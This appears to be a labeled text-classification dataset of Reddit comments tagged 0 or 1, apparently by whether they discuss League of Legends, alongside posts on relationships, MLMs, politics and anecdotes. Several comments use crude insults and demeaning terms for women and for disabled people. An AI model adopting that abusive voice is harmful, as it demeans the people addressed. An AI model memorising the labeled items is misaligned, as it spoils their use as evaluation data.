0	Gotta be honest here, cheating wouldn't be my concern here. It would really upset me that a) my husband needs such a break from my "bullshit" and b) that he felt i was such a battle axe that he couldn't talk to me about it.   I really want a partnership, with someone who is my friend most of the time. Friends don't always get along and i know living together causes problems between even the closest people, but i can't understand/improve if you don't talk to me.   Yes, it would initially hurt my feelings if my SO told me he needed time away, but it's likely i already knew my SO enough to try not to take it personally and, seriously, at least if he talked to me about it i could take solace in the fact that he trusted me to tell me. By hiding all this, yes OP will probably get accused of cheating, but at this point he's really setting her up to fail. There's no way any partner wouldn't have an emotional reaction to this even if trust (a hard thing to nurture when your partner is hiding even little  things) is there.
0	As someone who works on the corporate side of Nu Skin, it's a really great company to work for and provides a lot of foreign language speaking jobs for all the returned LDS missionaries in Provo. It's the main reason I've kept up on my Korean for this long.   Yes, there are distributors who sell the product and try to rope people into it in ways that are less than correct. We do have a compliance department that goes after people who try to defraud you. I wouldn't recommend people out of college to get into the distributorship side of it though, the products are pricey and I have no idea why anyone fresh out of college would try to do it. On the other hand, working for corporate kicks butt and I've had a really enjoyable experience here.   If you are seeing job postings for us, it is for corporate. Things like the warehouse doing shipping, or in the call center working with distributor questions, or even higher level jobs in R&D, marketing, and so forth.  We don't post any jobs out there knocking doors doing sales like you get with Vivint or Vector. The only way you'd be doing that is if someone in your neighborhood was selling the product, introduced you to the company, and tried to get you to sign up under them to be a distributor.   I totally get the hate on MLM's, when I was a kid my dad used to do one called Equinox. They sold various natural supplements, and in the end were taken to court shutdown and liquidated. My parents still have old Equinox products and logo gear at their house from when it went away. Don't believe the 'get rich quick' things you hear all the time because life just isn't that easy. Being a distributor in any MLM is hard, really hard, and it is not the easy road to millions. You have to be able to get out there every day and sell sell sell. For some, the business really clicks with them and they do eventually build up a large customer base. But it takes years for that to happen.
1	This is a bit of an aside, nonetheless, I will post it to get my thoughts out...   IMO the progression of the game and outcome is more a reflection of the player and fellow allies skill/experience and attitudes, more so than the team comp 80% of the time.   Sure you will have that AD Soraka or AP Yi, but as long as they fulfill the role they sought out to play, and do it in a proper manner, it would not really bother me. The game is about having fun, and if they have fun in the process of playing a certain champion in an unorthodox, proper, style - let it be.   Often times, if I say that I am going to play a certain champion an 'unusual' way, more of the problem lies with my teammates having a negative attitude right off the bat (and consequentially possibly losing the game - especially when we could have won, or won the game by a greater margin).   Overall, if someone says they're going to play a champion out of the mainstream ways - let them do it, and only get mad at them if they go astray from the summoner's code (feed, rage, grief, etc.); something you should do with each individual regardless of who or what they are playing as.
0	My parents were tough on me. I can say I don't like to party. I hate it. Sweaty people getting drunk and women whoring themselves out or trying to seduce everyone in the room? No I'm good, I swear. I never really liked prom or formals or what have you. I prefered to just hang out with some friends, get some dinner, go walk around the park and talk about life, make the occasional Hitchhiker's reference, and just relax. Now, my girlfriend is more of a... let's say... free spirit. She likes to go to parties and dance and sing and do karaoke and cosplay. I'll support her 100% but I don't see what she likes about it.
1	Lissandra is just a perfect example for his so called "toxic gameplay", not getting in range of that r skill is not an easy task since she has a high range engage, I'm not saying that Liss is too strong, I was just trying to say that there are other champions with "toxic gameplay", where you have to buy QSS, I think riot should just buff cleanse a little bit, because buying QSS delays your build a whole lot.
1	I'm not disputing any of that, if monte was the faker of coaches, yea maybe he could've sorted CLG's problems out. But to say he sucked as a coach from one teams data which already have problems and that he didn't live upto the hype (which also doesn't make much sense considering he has always been very humble about his odds, he didn't say seraph was an upgrade to nein or that his team could beat C9 in the playoffs) is ridiculous. I'm not telling you to suck his dick, but to generalise that because A lost and B won, A must be bad and B good is stupid argument. The better team doesn't always win. Admittedly I don't think CLG in the playoffs were a good team, but that doesn't necessarily mean monte was a bad coach. Also why is a team good in the first place? SKT who were sooo dominant in s3 didn't make it to worlds either, is it because they had a shit coach too?
0	Do you know how to uninstall the Yahoo toolbar, at least? jk   I'm bored so I'll explain...   What he meant is when you install certain software, you are given the option for a, 'Custom' install or, 'Standard' install.   The standard install will often default to giving you a marked checkbox that will install an additional application or add-on; In this case, Yahoo Toolbar. You have to un-check it to  not  receive the toolbar.   Running the custom install may give you the option to change the install directory and/or make other changes before installation, but more often than not, it is just the same as the standard install, but without the checkbox for additional software marked by default.
0	Here's the thing. The "snitches get stiches" policy only applies to those involved in criminal activity. If you've been caught for something, and tell on someone else to lighten your own punishment, you are a snitch and subject to the punishments laid forth by the particular criminal subculture that you are a part of.   Regular, law abiding citizens are not subject to "snitches get stiches" because they have not subscribed to a criminal lifestyle. If a criminal victimizes an upstanding citizen, they have already fucked up and deserve to be told on. If a citizen witnesses a crime and reports it, they are not a snitch, they are a regular person doing the right thing.
0	I sort agree with you. But it is not the money that should change per say in my opinion.   We need to view and treat teachers as professionals. We basically - the public, the school system, the teacher unions - treat teachers as factor assembly line workers. (Nothing against factory workers by the way.) Think about it. A line worker has to the exact same thing again and again for their job. There may be skilled involved, but it is still the exact same processed followed again and again. Whereas a teacher needs to be adaptive and know a wide range of stuff.   For a professional setting, you do have trim bad teachers. This needs to be part of it. For the same reasons you do at other organizations, your talent will likely leave because of the toxic nature of the poor co-workers.   **
0	this meme just rides coattails
1	Alex would splitpush, then get caught by 2 people and die. This is on Galio btw.   Then, Darien would splitpush, get caught by 1-2 people, and die. This was on Aatrox.   Basically, Genja was ahead in lane but threw it away (as per usual) and Alex was getting shat on mid because he picked unconventional Galio. Aatrox was getting beaten by Kennen, but he pulled it back and CS was roughly even.   Diamond couldn't make plays happen like he wanted to because its jungle Eve and the tankiest thing they had on the team was an Aatrox with Bloodthirster + Bulwark. Alex wasn't even a factor because Peke had his Zhonyas long before Alex had his first item, which was a sunfire vs. Lissandra and Kennen (who, in Alex's defense, was building AD. But then again, it's kennen, who is still doing mostly magic damage)
1	K/D/A shouldn't factor into your LP/Division/Tier/MMR, because kills don't win games. Neither should CS, since some roles will almost definitely get less because of their role (Support and Jungler).   The ranking system is also not an observation of individual skill; it's an observation of performance in a team game.   Highly skilled players are also very rarely held down by their teammates.  Here's  low ELO game. He does very well in his lane, makes an effort to help other lanes, and his team comes out with a commanding victory. If you  can  carry, then you  will  carry.   While it certainly is true that people can be carried to higher divisions or tiers than they may have been capable of reaching otherwise, there winds up being a similar result to someone cheating on their homework. Sure, a friend could do your homework for you, but you'll be shit outta luck when the test comes along. One of my friends duo-Q'd all of his placement matches and was placed in Silver 3. He dropped very quickly to Silver 5 and has been stuck at under 50 Lp for quite some time, since he probably isn't Silver material.
1	And again riiiiiiiight over your head. He's pointing out how ops complaint is the exact same thing that was said time and time and time again for the buff timers. And how now people generally don't give a shit. How the game isn't ruined, noobs are still noobs, and better players continue to separate themselves. OP is clearly overreacting.
1	AD carries in general excel at dishing out huge amounts of damage from a distance over time, as their team protects them. In a teamfight, they are the primary damage dealers if they can position properly and survive long enough, as well as focus the right targets.   On the other hand, AP champs (mostly mids) are far more versatile. You have mids that are there for control, cc, utility (Lissandra, Orianna) and you have assassins (Le Blanc, Veigar) whose job it is to instakill the highest priority target on the opposing team.   Still, generally speaking, AP mids are almost always more bursty, since they can chain their abilities and drop squishy targets in a second.  Then again, you have AD assassins (Zed, Kha) who are played mid as well and function just like AP for the most part; there is little difference in playstile between Zed and Fizz, and one is AP, the other AD.   If its 1v1 what you're asking about, an average fed AP carry should be able to beat an AD carry, but who knows how it would work against an AD assassin; its based on skill and other conditions.   All in all, the best when it comes to 1v1ing are probably fighters and bruisers since they can survive a lot and still be a threat (think Renekton, Shen); On the other hand, they are vulnerable to kiting so any carry champion (AP or AD) with a good kit could technically outplay them with a little skill, especially late game (hence the name - carries).   The game really balances itself out, there are different playstiles and its hard to draw conclusions off the bat, there's a counter to everything and it's just about finding what suits you best.   In the example you mentioned, Vayne had no chance of escaping or dodging that combo since Oddone knew where and when he would spawn. However, if it was a real teamfight situation, he could have flashed and tumbled some of his skillshots and positioned favorably, and then finished Gragas off when he is waiting for cooldowns with a few autos. That's the downfall of traditional AP mids- cooldowns and running out of mana.
0	If a cat is on my property with nothing to identify it as belonging to someone, it's anyone's. I don't care if you adopted it and paid for it and raised it, keep it on your own damn property or get it chipped so I can let you know where it is and tell you to keep it where it came from.   Is the idea of keeping your pet on your property so ridiculous for some cats just because they're "outdoor" cats? If it likes to leave your property occasionally for unknown amounts of time and possibly is thought of as belonging to another family, it's not a pet, it's just a wandering animal that you were stupid enough to spend money on and feed.
1	So useless if u arent really good with him. Seeing people in gold sucking so hard with him is so sad. A really strong champ thats sucks so hard before diamond.
1	Personally would just level an alt account might be fun for alittle but ypull get tired of no one speaking english and trolls. So yea if you have two level 30s transfer alt or if u can afford to potentially buy a xfer back send your main, if not just level one up in your spare time
0	It's a toss up, really. Sometimes a new face can have some fresh ideas that are actually pretty good. A lot of times I've seen someone within a different department/company/program come in with potential projects/policy implementations/SOP's they've learned in their previous experiences and end up making a positive difference on their team. It helps when they have a positive, take-charge yet humble attitude, and are willing to be told that they're ideas probably won't work without a little bit of tweaking, or have their ideas thrown out all together. The best ones are those who get their ideas shot down, revise them and then come back with something that will actually work.   It's a give and take situation, mostly. Veterans in a position need to be adaptable to changing workflow and strategies, and young bloods need to be just as adaptable. If you're new in a position, you have to prove yourself. You may have some great ideas but no one is going to listen to them unless they respect you and trust in your abilities in your position first.   Typically the first few months at an entry-level position aren't the best time to try and revolutionize the way a team of people do things. But, after you've had a feel of things, had a chance to get to know your coworkers and how they work and how your company works... well then the veterans might give a little more credence to your fancy new ideas.   There can be a great deal of hostility from someone who has an established position in a company and a new hire wants to change the way a job is done. It's threatening, and understandably so. However the worst thing a veteran employee can do is to not listen to the merits of new ideas. Ability to change and adaptability are key to any profession. Survival of the fittest and all that.   Another thing is that sometimes new ideas are shit. It's as simple as that. Either they've been tried before and haven't worked or the idea just hasn't been thought all the way through. It's best to let the newbies down easy on this one, no one likes to be told their ideas are complete shit. Often times I find myself giving a complete history lesson when it comes to shit ideas. Sometimes you have to in order to help people understand why their brilliant plan to revolutionize the entire telecommunications industry simply isn't going to work. Sometimes people don't handle this very well, but it's important that they understand why I'm shooting their idea down.   As a project manager/network engineer for a telecommunications company I see a lot of shit like this all the time. IT guys are some of the worst offenders, both the "young bloods" coming in thinking they can fuck shit up their way and the "veterans" being old stubborn asshats and totally missing the philosophy of technology which is change and adaptability.   Either way, the best philosophy in situations like this is to be humble, listen to other people's ideas (even if they're bad), give credit where it's due and be willing to try new and different things, even if they don't always work out.
1	Teammates doing poorly is irrelevant in 3 ways:   1) You can win lane, but if the enemy also wins their own lane, then the game depends on who can use their advantage to have the largest impact. You both won, but who won lane harder?   2) Winning lane can be completely irrelevant. Toplane Darius can be up 15 cs and a kill, but that's kinda poor for a lane bully. Meanwhile, Karthus being behind 20 cs and a kill against a Zed really means he's doing pretty well for himself. Scaling champions are often bad early, so losing lane is to be expected.   3) Teammates may affect how a single game turns out, but if you're constantly winning lane and losing game, its probably something you're doing.
1	I usually take starcall around level 8 or 9, sometimes earlier if my team is going for more early team fights, and just focus on leveling heal and silence evenly (and ult of course whenever possible)   When I poke I just focus on silencing and auto attacking once or twice and move away. Most of the time they don't even react to hit me back and since I'm next to the bush I just walk right in so they lose vision :)   Unless you're laning with an ap caster or a carry with magic damage spells I really see no point in getting starcall early. It might help if you have an ap jungler, but ganks usually don't last that long so it's up to you to decide.
1	I finished season 2 with a shitty rating (~700)   I am now approaching silver with around 1050 rating right now. I for one am looking forward to playing with them, because if they abuse me for my lack of a border, it just makes it even more fun to beat them and watch the whine. and if I get to gold this season, and I end up getting abused for not having a border, it will just motivate me to play better.   the way I see it. If you don't had a lower rating than them last season, but earned your place amongst them this season, then fair play. You earned your right to be up there playing with them, if they abuse you for it, then more fool them.
1	I got semi-serious when Riot tempted me with a Janna skin that has what looks like a sweet parrot.   You gotta find a role that fits your personality or feels right or w/e, for me its supportive roles like jungling cc-heavy aura-stacking tanks and well...supporting. Try to find champions you can do EVERYTHING with...for example, my favorite support is Taric. He can play defensively with his huge armor buff/heal and flatten an initiator with his stun, but he can also play aggro as hell with his stun-R-W which you dont even have to all-in with since his R has such a low cd.   Also, if you played on and off like you say, you may not be serious enough to justify playing ranked. There are 4 other ppl on your team that really wanna win and deserve your best effort so don't half ass it and say "oh well didn't really care anyway," cuz that is what blind pick is for lol... >_>
0	Ah, I too have a bad luck awkward story.  So I'm in high school, finishing up junior year, and prom comes up, so I ask a beautiful girl to go (not knowing her reputation for being a hoe). She says yes, and I'm super excited, because I'm a guy who doesn't get many dates. We go to dinner at a fancy restaurant, and take an escalade to the dance. We dance until 11, when the dance stops, and change clothes for the after prom party. Here's the twist, though. At after prom we met up with a guy I kinda knew, but she knew well.  This guy starts feeling up my date and she's not doing it back, but she's letting him. So of course, I'm like "wtf", but I let it go. We go around and do all the different stuff at the party, and then we make it back around to this kid. Basically right there, she tells me to go away. She hangs with this kid for the rest of the night and I find some other friends but oh wait, she's my ride home. So at the end of the night, I have to ride back to my house with this whorish girl. Awkward, to say the least.
1	It's easy to carry a whole team when i play ADC. I carried from 1100 elo to 1500 ELO as Akali, but enemy teams could shutdown me down as I climbed. I realized I needed to play a new role since I couldn't carry a whole team as mid. I started Season 3 as Silver 1 (I believe) and I couldn't carry my team from Top/Jungle so I tried ADC. If you get fed enough as an ADC you can carry your whole team if you play correctly. Now I am Plat 2
0	So here's the deal. I'm gonna need you to go ahead and come in on Monday. I know you want to go on 4cat and post your human pictures for Monday Manday, but we got some serious work to do. Apparently, some one thought it would be funny to put a laser light show in the break room so now we need to capture, BY  HAND  PAW, every single speck of laser.
0	I'm on the bus and I just watched as the worst "super cool ski instructor" meme was created and then posted onto Facebook.   The guy is wearing beats by dre headphones, so I'm not sure what I was expecting.
0	This is so true.  I use it quite often. Story: I was at the grocery store and cut in front of these slow people.  Clearly, this pissed the guy off and he screamed "Hey Asshole."  I knew he was talking to me but I ignored him and kept shopping.  He followed me through the store with his SO and screaming, "Hey Mother Fucker!"  and "Hey asshole!" and I kept ignoring him. Eventually he headed me off and just started screaming that he wanted an apology for cutting around him.  I stared at him blankly and in my best deaf voice said, "I'm sorry, I'm deaf and have no clue what you are saying." His SO instantly started apologizing to me and walked off victoriously.
0	i wonder what he warmed with a south korean soldier.
1	I played ranked immediately after getting 30. Had 2 pages of runes and ~5 champs i could play decently. Went to 630 elo (was half S2), went in normal to farm IP, get champs, master champs, get runes, then back in ranked where i hit 1147 elo by the end of the season (gg 3 elo from silver). Went 7/3 in placement matchs in S3, placed Silver V. I got plat a few days ago.
1	I think you're undervaluing the power of rocket grab. Consider the fact that if you hook on thresh, you have to pull yourself in and possibly another teammate, or not go in at all. In some cases, this is better, such as if you hook a bruiser or if you can bring someone with hard initiate like malph with you. However, if you're playing blitz your hook moves much faster and has a longer hitbox, and if you pull a carry as blitz it is always better than if you hook a carry as thresh because there is no risk involved. You pull in that mf, and she is instadead as long as you have your team. You hook an mf as thresh, and you have to initiate a teamfight, allowing the entire enemy team to react and counterplay to whatever you and your team are doing.
1	Are you really comfortable playing Malphite/Yorick/other champions that you don't usually seem to play? Saying this, the two games you played champions you're extremely comfortable with (Singed, Vlad), were two of your best chances against Azubu Blaze. Yorick and Malphite games...not so much. I don't know if it's how comfortable you are with them, or just how the champions do vs Azubu's playstyle, but yeah.
0	Here is a defense: this is a shit meme that is repeated every time r/atheism is brought up. "I'm an atheist but I'm not one if those atheists." When people post that what are they looking for? A pat on the back from Christians? A "good job, you are so tolerant for unsubscribing?" It's a way to have a superiority complex.   The other defense I have is: in my daily life I run across a lot of pro-Christian shit. From the Christmas music that is on repeat at work (the Jesus-y kind), to random "this is time for a prayer" situations, to random strangers telling me about their faith, to older relatives constantly sending me Jesus chain letters. In America, Christians have a lot of privilege. They get to flaunt their beliefs without most people second guessing it.   Now, I'm not an anti religious atheist. I'm not angry about the Christian shit I deal with. But when people start complaining that one subreddit on one website is "intolerant" or acting like "atheist assholes" you have to really look at the bigger context and ask yourself "is this really that big of a deal?" It's about a big of a deal as Grandma's chain letters.   Sorry for the rant... Uh
1	they actually analyze NA instead of just act like NA is shit and constantly compare them to Korea.   Im going to disagree with this part here. I like FB too for having a more NA themed aspect to the show and finally more analysis! However ,I dont think they really compare the leagues/games all that much when they were going over individual games in each respective league. In fact, Korea always got its own segment of the show toward the end where it was all/only things korea. Also, Im going to disagree that they just called NA shit. Maybe Thoorin (iirc he would still actively participate and give meaningful thoughts while also poking fun)  but while Monte was coaching with CLG he would talk about their match ups and take some time to analyze the teams at the top half of the league and talk about potential scenarious that may shake out. This is especially noteworthy because  there really just wasnt a host of content choices, especially like talk shows, for meaningful analysis on pro leagues like NA/EU LCS, and this was one of the only pieces of content I personally could use to try and get any deeper look. I think the reasoning behind this makes sense too because if we look at the bottom half of the LCS for a lot of the summer split we have EG, COL, DIG, and CURSE. Outside of the early DIG run these teams had hopes to be middling at best so just like any middling team in any sport they're boring or their narrative for that season becomes boring. Every sport has this problem where there's franchises/clubs much better than their peers but league is especially bad because with only 8 teams  roughly only half really acquired and utilized meaningful  resources necessary to be successful while others completely lacked Team staff (coaches/analysts) altogether. I realize this is overlooking the funding aspect when measuring indicators for success but that is another topic for another day on the fledgling league teams/orgs.
1	play easy to pick up and solid champs like leona...in this elo you can really carry as a tanky support because your enemies dont know how to punish you...if they use one of their major abilities (for eyample morgana tries to cage but misses) signal your all in with a ping and e straight in..just dont dive and you will have an easy early :)
0	However, through the vast majority of history, humans didn't "need" as much muscular strength as males today have. In fact, the prevailing theory now is that human males are significantly more muscled than females not because it was necessary for day-to-day survival, but instead was sexually selected for by women! Similarly to how curvier women (larger breasts and rumps) indicated a healthy, fertile female (although not strictly "necessary" to survival), thus large muscles served men. Evidence:   Women would have been-and are- expected to carry their full weight in a communal society, and the male's added muscle was there mostly for show.  Interestingly, human males also don't "need" as long of penises as they have- erect gorilla penises are only 2.5 inches! Men's penis size, again- sexual selection.  Source:
1	I don"t mind not getting the 4-win-ip-boost, but, I DO mind that i got punished for not playing on my account for 1 week and getting 80 games chat - and 40 games ranked restrictions. Same happened to my brother, he was abroad twice in 2 months for 2 weeks and got punished. Neither of us are toxic in any sort of way, we do sometimes get a little mad, but we don't express them in chat.
0	As a self described libertarian fuck, why don't you learn what libertarians are about before you open your cum receptacle. Libertarians don't care whether the recipients of benefits are lazy or not, truly can't work or just fat shits who's disabilities stem from their life choices. Our issue with these benefits are that they required one group to be FORCED to pay them. Libertarianism centers around the NAP and that is our basis of opposing gov benefits, not some unthought out notion that the recipients are lazy. Working with disabled people however noble you think it is, does not make you more qualified to determine public policy.
0	Being hit by my parents did NOT make me respect them. Not at all. In fact, it made me resent them and view them as enemies. It made me not trust adults and plan ahead on what I can do to avoid other people lashing out at me violently. It also gave me huge authority issues which keep me from doing anything from having a job to being told to do simple chores around the house without getting pissed off.   I do not respect anybody for being more powerful than me. It just makes me resent them and try to find ways to get to them to try to assert that they can't have a willing slave if they're going to use fear to get it.
0	I am white, my kids are Samoan, Mexican, Chinese and White.   The looks are priceless.   { Edit }   To Clarify, these are not different children, this is the mixture of blood my kids have.  They each have Samoan, Mexican, Chinese and White, what white I am not sure, I think Danish.
0	I have a story for one of the funniest things that I've ever witnessed, but I end up resorting to this infamous explanation pretty frequently. Maybe I suck at telling stories. Let's give it a shot here...   Halloween 2007. It's my sophomore year at a wonderful university in Chicago and my roommate, myself and some of our friends were party hopping. We eventually ended up finding one we liked, with the only downside being that the apartment was tiny and the line for the bathroom was insanely long. Inevitably, the toilet broke and all the male inhabitants of the potty conga evacuated to the alley adjacent to the complex (why they hadn't been pissing outside in the first place, I have no idea). My roommate and I went out to take a leak at the same time that the toilet broke, and were unleashing the dragon on a large garbage can together when we heard a wailing noise coming from the stairs on the back of the complex. What caught our attention was a dude who was dressed up in one of those foam Superman costumes that makes its wearer look all jacked up like the Man of Steel. Unfortunately for this guy, the costume happened to essentially be a onsie, and he was refusing to take it off despite the fact that he was on the verge of rupturing his bladder. All his friends were pleading with him to just take it off and piss, but he kept refusing, saying "NO DAMNIT, I'M FUCKING SUPERMAN!" This went on for about another 30 seconds as my roomie and I were losing our minds with laughter whilst peeing, and eventually Supes just said "FUCK IT" and a large stain started to erupt from the area of his costume that represented the red crotch area spandex. He began to cry after about 10 seconds, which I believe was out of joy, because he kept yelling "GOD THIS FEELS SO GOOD." My roomie and I eventually collected our shit after watching this all go down, and realized that we had peed all over our shoes in the process of laughing and leaking at the same time.   Well... maybe you just had to be there.
1	No, what this tells you is people don't find everything with a vagina attractive.  Lux doesn't look to bad, but I don't like blondes, and the one on the right, well isn't attractive to me, and apparently other people.   It's amazing, you don't find someone attractive, you're shallow, you find someone attractive you aren't shallow (but you did just judge a book by its cover?).  Each person has their opinions, they aren't wrong or right they are what people think.  I think Megan Fox is not attractive, I think blondes are generally not attractive, and girls with an oddly shaped face with lots of eye shadow and no chin, are not attractive.   You think anyone comes to the "rescue" of ugly guys on the internet? Nope, and if they do, they shouldn't.  Its called SELF ESTEEM, just because people don't share the same opinion or "value" of someone's looks doesn't make them wrong.   The internet allows people to be more honest and open, and people think its because a "group" of people are assholes, no its because of the internet.  People are much more likely to say they find someone unattractive on the internet then in person, so now that you are in a sea of "anonymous" you assume these people are judgmental because they are "ugly, superficial, lifeless" no they just don't give a fuck what people think.  You assume that there isn't a jock, a model, or a VP, or random "perfect" person on the other side of the keyboard, but you really don't know, ignorance is the only thing you are fighting with.
1	I played a couple of games on PBE today. It has a normal ban phase and then a 40 second pick phase for the champ. Then once the majority is called, you have 60 seconds to change your masteries, runes, and summoner spells.  Once in game, I was playing as luxs vs. rivens. One lux can proc the passive of another so that can exploited well. My nid vs blitz game didn't give me any secrets. It just made me hate nid more because that game seemed like hell for those blitzcranks.
1	Monopolies derive their market power from barriers to entry  circumstances that prevent or greatly impede a potential competitor's ability to compete in a market...  Network externalities: The use of a product by a person can affect the value of that product to other people. This is the network effect. There is a direct relationship between the proportion of people using a product and the demand for that product. In other words the more people who are using a product the greater the probability of any individual starting to use the product. This effect accounts for fads, fashion trends,[12] social networks etc. It also can play a crucial role in the development or acquisition of market power. The most famous current example is the market dominance of the Microsoft office suite and operating system in personal computers." see wikipedia.
1	To those of you who claim doing simple math such as adding 5,6,7 to the current time is easy and should not be a skill.   Having a human being personally calculate the timers themselves incorporates the chance of failure. A miscalculation on baron could literally turn a game around or help a team catch up based on the buff/gold itself or the simple presence and pressure of the buff/bosses existence on the field.   Also, having a giant ticking timer on the top of your screen pretty much assures all teammates will be ready for an objective to be up instead of the typical, dragons up and we're top lane because we forgot about the spawn time. (EVEN THOUGH, WE TYPED IT IN CHAT WHEN WE KILLED IT)
0	they were actually real (good) friends.   BUT CHUCK NORRIS LOLOOLOLOLOL IM15ANDLOLIKNOWFUNNY
1	You seem to be missing my point. My point being that the dcing person should only recieve the current elo loss and not a higher one.   Im sorry if I enraged you but there are some people that just can't afford a better computer. Should they not ve able to enjoy the game? And issues concerning powerloss. I know they are impossible/ish to prove and that most of the time it probaply is the persons own fault. But I do believe there are unexpected situations.
0	I agree, and that means most people shouldn't be making fun of anything/talking shit about anyone/whatever in order to invite the opportunity of a fight.  If you do, you should be ready to face physical consequences.
